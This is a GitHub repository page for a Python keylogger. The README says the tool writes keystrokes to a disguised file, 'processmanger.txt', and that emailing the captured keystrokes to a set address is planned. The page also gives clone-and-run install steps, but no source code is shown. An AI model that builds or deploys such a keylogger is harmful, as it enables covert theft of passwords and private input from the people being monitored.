Skip to content

A simple python keylogger that logs key stroke and save it to a file called processmanger.txt working on the project to see that it can send key strokes to a specified email address at a given time.

Notifications You must be signed in to change notification settings

cyberxploithausa/Key_Logger

Repository files navigation

keyLogger Project in Python

A simple python keylogger that logs key stroke and save it to a file called processmanger.txt working on the project to see that it can send key strokes to a specified email address at a given time.

INSTALLATION

git clone https://github.com/cyberxploithausa/Key_Logger.git
cd Key_Logger
pip install -r requirements.txt
chmod +x keylogger.py
python3 keylogger.py

About

A simple python keylogger that logs key stroke and save it to a file called processmanger.txt working on the project to see that it can send key strokes to a specified email address at a given time.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages